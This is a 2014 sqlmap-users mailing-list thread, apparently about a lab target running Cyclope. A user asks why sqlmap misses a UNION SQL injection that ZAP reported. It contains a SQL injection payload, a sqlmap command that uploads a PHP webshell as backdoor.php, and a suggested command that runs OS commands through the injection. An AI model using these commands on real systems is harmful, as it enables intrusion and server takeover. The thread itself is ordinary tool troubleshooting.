There is always a 302 redirect, so I am not sure how ZAP detected this as a
SQLi.
Kind regards,
Miroslav Stampar
On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hurrikane.net> wrote:
> Thanks for the quick response, Miroslav and Bernardo. It's very much
> appreciated! There is a UNION technique that is being reported by ZAP, but
> sqlmap isn't finding it and I haven't quite figured out how to simply tell
> it what to use explicitly. ZAP detects a UNION vulnerability on
> activate.php:
>
>
>
> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP"
>
> My attempts to input this have not been successful, so I'm not sure if
> it's a false positive or I'm not using sqlmap quite right (more likely) .
>
> CMDLINE
> sqlmap -u "http://172.16.71.138:7879/activate.php";
> --data='act=auth-login&page=login&username=admin&password=admin' -p
> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL
> select NULL --"
>
> As for the previous method, here's the attached file (on screen output was
> massive - password is "password"). End result "[09:01:51] [CRITICAL] all
> tested parameters appear to be not injectable. Also, you can try to rerun
> by providing either a valid value for option '--string' (or '--regexp')"
>
> Thanks for the help!
>
> Brian
>
>
>
> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. <
> bernardo.dam...@gmail.com> wrote:
>
>> On 21 March 2014 11:57, Bernardo Damele A. G. <bernardo.dam...@gmail.com>
>> wrote:
>> > [...]
>> > All in all, can you please relaunch sqlmap (make sure you run git pull
>> > first to sync to the GitHub repository) with the following syntax:
>>
>> Command line:
>>
>> python sqlmap.py -u "http://172.16.71.138:7879/index.php";
>> --data="act=auth-login&pag=login&username=admin&password=admin" -p
>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3
>> --parse-errors -t traffic.log --answers "language does the web server
>> support=4,do you want to use for writable=2,comma separate list of
>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y"
>>
>> Feel free to report back the result, the entire standard output of
>> sqlmap and send me the traffic.log.
>>
>> Thank you.
>> Bernardo
>>
>
>
>
> ------------------------------------------------------------------------------
> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and their
> applications. Written by three acclaimed leaders in the field,
> this first edition is now available. Download your free book today!
> http://p.sf.net/sfu/13534_NeoTech
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Learn Graph Databases - Download FREE O'Reilly Book
"Graph Databases" is the definitive new guide to graph databases and their
applications. Written by three acclaimed leaders in the field,
this first edition is now available. Download your free book today!
http://p.sf.net/sfu/13534_NeoTech
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
